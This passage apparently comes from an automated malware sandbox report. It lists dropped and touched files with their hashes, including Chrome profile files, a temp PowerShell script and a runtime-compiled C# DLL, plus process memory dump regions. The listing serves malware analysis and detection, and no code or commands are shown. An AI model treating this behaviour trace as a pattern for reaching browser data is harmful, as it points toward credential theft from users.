7efbf2cc6df1ad3cb31915c508ebe34053f116c67d4ae386c26c62ca6b1a5163

SHA512
215c99968b56b629777a11e60d71137f32772bb497abf06ca3854f1cccacb651a4da661bd5b4915f2d3800065a63b1e70bbdd0baa6574d9eb5f3264bf2f1f024

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
b3c585bec32bcbd4107464147c52bf0d

SHA1
d485ab78a85a3e83e9d199f7f539a21a97bd4117

SHA256
0c4ee448ba0062ca3d78ed5af3e95567661aaf26a74f8d5a9813c72de62b56d9

SHA512
d7dc169a3df7a49d7ab95b9d69ab28047a94d7772d2fee17d6284daaaf4aae4dae71167adf625cf16fa4d56a05621de9ff920521d85d9a73d4ca1741919df27a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
a0166921987f82e87725c83e4e2c6ae1

SHA1
2ee3c2ad5363acc6fbcc5eaef0c0af29932d6d0c

SHA256
8014cf705980ffd5fc8efcd294777a551e084bb977a1c278700c1e5b9af41905

SHA512
d2df7b99c2561438b5df576fb69cafe0c4ff79570b7ffa7837ee925b9367819558f4e44169d9500eecb701b4910016a89fb3d4a6ef4e1a97b7c3bfcbd154e28d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
e8455d57366c1c458fae59960c587d6d

SHA1
4e0d7a737768469ba1a53fcd1cec3b143514b7e8

SHA256
512e81de918d9c3387b55cf44616a7813416396ea1732e2ec969508e39ae8c5b

SHA512
461cd012dfcca0559bd4ed5d48c4e847110692a88129f3648a4e533c21a1c55c3c8555b7d5a7e98b71d8efe09bfe51d669a687e3df5664c1266f3d11b960add3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
90KB

MD5
8b950122003f2dd232158ce2bd25530e

SHA1
1e17bf55b45b0ee74e7247d43b6a2da87645e8a0

SHA256
546bf14cac589ae573376bc5d76d945f4965ba5f3dab48d51ba3a0406157488b

SHA512
37175ae609a4da6be124f070915a0c19982a821f073a28b1e883d681f66d0f31dd5f570a5d41cf271153fbbd78e339932c51146cabe6d90f91089390e593ca2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe591ff2.TMP

Filesize
88KB

MD5
d34c459ea5bfc396b2132d99f93c715e

SHA1
3f608a9da1af6ea76f9e21754fae9813de6de464

SHA256
310f94ba78a2cdc3073fa8e55eed56f2186ab5c98b2b5a2678ff609841b292d9

SHA512
203d027986dc1b7127b645673c5c8607ed01171a8f93ae0a3e830a5b5924f6f2d759dc9cfb42de55b9d0a34da8f99a2130cd758d217411196712f69c67326484

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f2e64f727b99284e0e99d19e67abccfa

SHA1
e9521688b7d55ec13f5cce883d415fd8f3bd48f2

SHA256
dcb99136917b6a8b906fc240c3d98b4b0c355320e6bc7341c77e61897e744676

SHA512
54f584a844ba8f76d0b8c4d4088ec2a283ef59c82d78cac8ce3f9c35561a94f2415b443247bcae32157bb53f41ad636f2409ff999190affd0443504d5f9cff06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
edc94d6cffeec0aa87c5efc4d515f79a

SHA1
8ab843d139d849f5e72008e14013aa1008945e6d

SHA256
47d73c514b6ba6bea241dac0491ce942cedb7a5fb9621dca3c95ce5511f272f2

SHA512
0b9505035c2b8a9094647be0836afe701489d5b51ac758d13233c1e563809b219bb4443f2e527503af14573c32d733618dab1a35c8c7b789fbe4d52711572f11

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D72.tmp

Filesize
1KB

MD5
d0db9b87931db6653959a2f5f93ebedd

SHA1
8edbd654c7209eca826370059e7caa532b189db6

SHA256
29002e95b585743be02a5c5bbd70c84ecfb48ee7e389e3322326ca33abdead1f

SHA512
2052a96e3429f1298f3312c0c4e2fd82aefcaf11364517daabf79acb5f7b1e1f336c1245c272dd88ca21e0e752fe2a0bc8d70461f56609514cf7e14e5ff18805

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qftmqsxi.uzq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\powershell123.ps1

Filesize
46KB

MD5
b7ac61df622db1f81e37f31123637366

SHA1
b338853465d12656f5b05c01f277528e1faf089f

SHA256
e29ece70e76536d07c33fefca15c98912012887bcf8bf915d551ebf3e91cb3d0

SHA512
3335830de362999eb8735f21b97a8ed864108c37c44d4c8fcf158359b44ed9dd75f4f7c0599b9d6b2061a343a4a5127203e21da1b8502c673444207469096e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwihgsni\xwihgsni.dll

Filesize
3KB

MD5
205e83aedcfde4269ba58c03ac97259f

SHA1
4fcb39e976e322e25aa9a7e4977253f676711db7

SHA256
a625110ab2744eadd0cdad17025f7932882dd9b476684c8df6b4ebe3d62a46d6

SHA512
8fcd9ba2605b2fc3537e5b6938eff8925ef6d0bc435619e1d574538c8e48d1fa2d25fcc2836345217baf5237bdb5bf0bee11d3b1ab927ad1c84ba17901099009

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwihgsni\CSCE532A3A48E5D47D1B02FEDD28CC54.TMP

Filesize
652B

MD5
62444160128477c13134804a41a80548

SHA1
cd6b033ff95173aa658116ef131ad547d8ecfadd

SHA256
69a8f528e4c6fbe376b35e420d5ac7d28e7ca6dfc11c3104199476cb8b3a16a8

SHA512
0a9666473d7120f67fe347c442a59cd5ca60efd125d937c8f68de42877f104f1eefd976172170bdf943ccb940f0340f3b1661004576c01865a775d9d8237769f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwihgsni\xwihgsni.0.cs

Filesize
336B

MD5
016136b12c8022e3155820dd8811cf72

SHA1
27dc5ae36badef983dbda987bdb4c584659433b6

SHA256
363bc109def451724e5a8fa71b8598e7cd1ea4994622407006def7b2f67dfc56

SHA512
7055a3c610cc797f009cf7bce08febe6d90394736e86c8f4a0f13ee5b9b213649d0c0ce1288199f2aa6c38730b119c751233793f53f694badef0f577deb53c43

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwihgsni\xwihgsni.cmdline

Filesize
369B

MD5
434c8b99b174e4e9860f90dc9a78e5c6

SHA1
472ba99722721f0a42b1a5f2ec9f88bb652b55b3

SHA256
d5d56d13c9116bba0adc51892d73fb5296a5d3b1ea194dedeec203d332711322

SHA512
d7bdc5b1a056265ceb526670f93d304b6f2e0192ea0869a145ba14c84dcd578c3e3a858f18058329fd0b2453548608d6f6023ee844d3c21be719ca2d4d831dc6

Download Submit
memory/2952-60-0x00007FFFEB3C0000-0x00007FFFEBE82000-memory.dmp

Filesize
10.8MB

Download
memory/2952-58-0x000001F81E5F0000-0x000001F81E636000-memory.dmp

Filesize
280KB

Download
memory/2952-56-0x000001F806220000-0x000001F806228000-memory.dmp

Filesize
32KB

Download
memory/2952-43-0x000001F81E450000-0x000001F81E460000-memory.dmp

Filesize
64KB

Download
memory/2952-38-0x000001F81E450000-0x000001F81E460000-memory.dmp

Filesize
64KB

Download
memory/2952-37-0x00007FFFEB3C0000-0x00007FFFEBE82000-memory.dmp

Filesize
10.8MB

Download
memory/4076-12-0x000001E737450000-0x000001E737460000-memory.dmp

Filesize
64KB

Download
memory/4076-16-0x00007FFFEB3C0000-0x00007FFFEBE82000-memory.dmp

Filesize
10.8MB

Download
memory/4076-11-0x000001E737450000-0x000001E737460000-memory.dmp

Filesize
64KB

Download
memory/4076-8-0x000001E737410000-0x000001E737432000-memory.dmp

Filesize
136KB

Download
memory/4076-9-0x00007FFFEB3C0000-0x00007FFFEBE82000-memory.dmp

Filesize
10.8MB

Download
memory/4076-10-0x000001E737450000-0x000001E737460000-memory.dmp

Filesize
64KB

Download
memory/4780-29-0x000001B2915A0000-0x000001B2915B0000-memory.dmp

Filesize
64KB

Download
memory/4780-27-0x00007FFFEB3C0000-0x00007FFFEBE82000-memory.dmp

Filesize
10.8MB

Download
memory/4780-31-0x00007FFFEB3C0000-0x00007FFFEBE82000-memory.dmp

Filesize
10.8MB

Download